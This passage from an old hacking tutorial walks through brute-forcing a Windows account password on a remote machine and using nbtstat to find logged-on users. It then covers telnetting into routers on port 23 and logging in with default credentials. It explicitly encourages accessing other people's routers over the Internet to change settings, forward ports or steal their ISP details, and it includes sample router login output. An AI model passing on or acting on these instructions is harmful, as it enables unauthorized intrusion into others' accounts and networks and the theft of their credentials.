▓ Charset: 1234567890abcdefghijklmnopqrstuvwxyz

▓ Start length: 3

▓ Max length: 4

▓ Process priority: High

■ Starting...

» Trying 3 letters length passwords...

Terminated. Password found: 111

The password was brute forced and is displayed as: 111.


192.168.0.3 Is the IP of the machine your trying to get the account password from.

Guest is the account name your trying to crack

3 is start length of the password

4 is the maximum length of the password

High means the program will use a lot of resources - the higher the faster it can guess the
password.

With both these programs you can specify any account on a machine - administrator,
guest or whatever.

Remember you can find out what account is logged onto a machine by typing in this
command into CMD: nbtstat -a IP.It will show you the username currently logged on and
then you can try and crack that account password.

(19) Accessing Routers

Routers are devices which is used to route data on a network, it decides where certain
traffic should be sent to. A router acts as a gateway to the Internet and is use by most
people these days to access the Internet instead of Modems. A client PC could either be
connected to the Router through a LAN cable of with a Wireless card. Routers are mostly
configured though a web based system or with a command prompt window (cmd). Most
home users with ADSL use Routers as their gateway to the Internet. Most Routers are
configured so that it can only be administered though the Web based system when your
are connected to the Routers local network - the internal LAN. Connecting to the Router
you will use your web browser. A typical router IP address would be 192.168.0.1. So this
would be the address to use to connect to the Router though a browser:http://192.168.0.1/

If you are using a Router as your Internet gateway try connecting to it. Remember the
routers IP address could differ from the example above. If you don't know your Routers
IP address goes to command prompt and type in: ipconfig
Your local area connection gateway address will be your Routers IP address. Remember
the Router is your gateway to the Internet. When you are connected to your Router
though the web based system it will ask you a username and password. If you know the
login details use it to log into the Router. If you do not know the login details you can try
the default login details as set by the Router manufacturer. Have a look at this list with
default login details. In your Routers configuration you can set settings which the Router
uses the connect to the Internet, security settings, local LAN configurations, DHCP
settings, port forwarding, statistics and information about the Router status and many
more. Accessing a Router though a command prompt windows can be achieved by going
to command prompt (cmd) and typing in:

telnet 192.168.0.1 23

23 is the port which the Router will be access with. You can access someone else's Router
over the Internet, login and change settings or even steal their ISP (internet service
provider) details. When you Telnet to a Router and it bring up the login screen it
sometimes will show you what make and model the Router is. Then check the default
password list and see if you can login with those default login details and obtain access to
the Router. If the person who's Router it is has not changed the Router's default login
details you should be able to access the Router easily. Most home users do not change the
default passwords. When you access someone else's Router over the Internet, you can
change settings, forward ports, reset the Router or even steal their ISP (internet service
provider) details. Telnetting to a Marconi ADSL Router with the CX82310 chip from
Conexant on port 23 will give the following output:

01/01/99 CONEXANT SYSTEMS, INC.=20 00:04:10 ATU-R ACCESS RUNNER


ADSL TERMINAL (Annex A) 3.21 = =20 =20

LOGIN PASSWORD>

And logging into the Router will bring up the main menu:

01/04/99 CONEXANT SYSTEMS, INC. 02:00:45

ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.29

MAIN MENU

1. SYSTEM STATUS AND CONFIGURATION

2. ADSL MENU

4. REMOTE LOGON

Q. LOGOUT
ENTER CHOICE-->

You might also like